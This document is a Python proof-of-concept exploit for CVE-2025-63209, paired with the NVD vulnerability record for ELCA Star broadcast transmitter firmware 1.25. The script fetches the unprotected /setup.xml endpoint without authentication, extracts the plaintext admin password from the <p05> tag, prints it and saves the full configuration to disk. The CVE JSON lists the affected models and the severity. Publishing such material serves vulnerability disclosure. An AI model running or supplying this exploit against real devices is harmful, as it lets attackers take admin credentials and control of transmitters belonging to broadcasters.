CVE-2025-63209

#!/usr/bin/env python3 """ CVE-2025-63209 PoC ELCA Star Transmitter - Unauthenticated Admin Credential Disclosure """ import requests import sys import re def exploit(target_url): """Exploit CVE-2025-63209 to retrieve admin credentials""" setup_xml_url = f"{target_url.rstrip('/')}/setup.xml" print(f"[*] Target: {target_url}") print(f"[*] Requesting: {setup_xml_url}") try: response = requests.get(setup_xml_url, timeout=10) if response.status_code == 200: print(f"[+] Success! Received XML response ({len(response.text)} bytes)") # Extract admin password from <p05> tag password_match = re.search(r'<p05>([^<]+)</p05>', response.text) if password_match: admin_password = password_match.group(1) print(f"[+] Admin Password Found: {admin_password}") else: print("[-] No password found in <p05> tag") # Save full response with open('setup_xml_response.xml', 'w') as f: f.write(response.text) print("[*] Full response saved to setup_xml_response.xml") return True else: print(f"[-] Failed: HTTP {response.status_code}") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://192.168.1.100") sys.exit(1) exploit(sys.argv[1])

{"cve": {"id": "CVE-2025-63209", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:49.067", "lastModified": "2026-01-15T22:04:52.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ELCA Star Transmitter Remote Control firmware 1.25 for STAR150, BP1000, STAR300, STAR2000, STAR1000, STAR500, and possibly other models, contains an information disclosure vulnerability allowing unauthenticated attackers to retrieve admin credentials and system settings via an unprotected /setup.xml endpoint. The admin password is stored in plaintext under the <p05> XML tag, potentially leading to remote compromise of the transmitter system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:elcaradio:star150_firmware:1.25:*:*:*:*:*:*:*", "matchCriteriaId": "2DCB1D49-BDE0-40E2-B4DA-F8EF2950C731"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:elcaradio:star150:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2C404AD-4AC7-43B7-A603-F2AB6010E275"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:elcaradio:bp1000_firmware:1.25:*:*:*:*:*:*:*", "matchCriteriaId": "7CBA890D-8786-450E-B0D5-529D72DC119E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:elcaradio:bp1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "97DAAC20-0678-422A-9543-8C8739DDC08F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:elcaradio:star300_firmware:1.25:*:*:*:*:*:*:*", "matchCriteriaId": "1DCBF9FE-5E66-4302-AA53-8F7DFC97E65B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:elcaradio:star300:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F73BF23-FBB1-4C30-B192-1AEE651CE351"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:elcaradio:star2000_firmware:1.25:*:*:*:*:*:*:*", "matchCriteriaId": "3F0BEFB3-10A7-4FFB-861E-BE15BB5ABEAF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:elcaradio:star2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "E0400771-3687-45CA-B11B-79A535C1AC24"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:elcaradio:star1000_firmware:1.25:*:*:*:*:*:*:*", "matchCriteriaId": "255C19F1-72A1-4034-9942-464481115DF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:elcaradio:star1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "79C3C2FC-552E-497C-A780-91186FB64E1D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:elcaradio:star500_firmware:1.25:*:*:*:*:*:*:*", "matchCriteriaId": "F28926EB-5265-45AE-9E26-E98134BDD70F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:elcaradio:star500:-:*:*:*:*:*:*:*", "matchCriteriaId": "4E4259CA-BE44-4CE2-8CFB-5573BD613BB3"}]}]}], "references": [{"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63209_ELCA%20Star%20Transmitter%20Remote%20Control%20-%20Information%20Disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.elcaradio.com", "source": "[email protected]", "tags": ["Product"]}]}}